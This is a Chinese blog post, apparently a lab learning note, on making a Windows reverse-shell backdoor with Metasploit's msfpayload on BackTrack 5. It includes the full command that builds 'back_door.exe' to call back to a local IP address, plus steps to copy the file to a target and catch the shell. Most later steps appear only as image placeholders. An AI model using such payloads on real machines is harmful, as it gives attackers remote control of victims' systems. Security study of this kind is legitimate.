msf攻击载荷生成器

0x00 前言

这是我对 msf攻击载荷生成器的学习记录。

0x01 拓扑结构

在这里插入图片描述

0x02 过程

1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程

1.1 显示msfpayload命令的使用方法:msfpayload -h
在这里插入图片描述

1.2显示msfpayload支持的全面载荷:msfpayload -l
在这里插入图片描述

1.3显示windows/shell_reverse_tcp这个payload需要设置的参数:msfpayload windows/shell_reverse_tcp O
在这里插入图片描述

1.4设置反弹连接的地址为IP(BackTrack 5),“X”参数表示生成可执行文件,可执行文件名为back_door.exe,该文件在当前目录下: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.106 X >back_door.exe

在这里插入图片描述

1.5使用命令ls显示当前目录

在这里插入图片描述
1.6拷贝该可执行文件到服务端计算机上

2. 启动metasploit

1.7在执行该可执行文件前,架设监听的服务器,启动metasploit

在这里插入图片描述
1.8启用模块
在这里插入图片描述

1.9设置payload

在这里插入图片描述
1.10查看选项
在这里插入图片描述

1.11设置选项
在这里插入图片描述

1.12 exploit

在这里插入图片描述
1.13在服务端计算机上执行文件
在这里插入图片描述

1.14成功建立反弹连接

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值